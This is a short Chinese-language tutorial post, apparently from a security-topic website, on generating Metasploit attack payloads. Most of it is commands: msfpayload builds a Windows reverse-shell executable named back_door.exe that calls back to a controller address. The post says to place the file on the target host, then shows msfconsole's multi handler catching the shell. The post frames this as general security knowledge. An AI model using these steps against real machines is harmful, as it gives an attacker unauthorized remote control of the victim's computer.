【人人都该知道的网络安全】msf攻击载荷
1、拓扑结构
2、使用msf生成
msfpayload -h //显示msfpayload命令的使用方法
3、msfpayload -l
显示msfpayload支持的全面载荷
4、msfpayload windows/shell_reverse_tcp O
显示shell_reverse_tcp这个payload需要设置的参数,该payload会从服务器反弹连接到指定的控制端上,以上的“o”是大写的英文字母
5、msfpayload windows/shell_reverse_tcp LHOST=192.168.1.106 X>back_door.exe 设置反弹连接的地址为192.168.1.106,X参数表示生成可执行文件。
6、生成的可执行文件
7、将文件放在被攻击的主机上
1、使用msfconsole进行测试
2、use exploit/multi/handle //装入模块
set payload windows/shell/reverse_tcp//设置
Show options//查看选项
3、set LHOST 192.168.1.106//设置选项
exploit //启用模块
1、得到反弹连接
声明:本网站引用、摘录或转载内容仅供网站访问者交流或参考,不代表本站立场,如存在版权或非法内容,请联系站长删除,联系邮箱:site.kefu@qq.com。
阅读量:34
阅读量:38
阅读量:65
阅读量:84
阅读量:55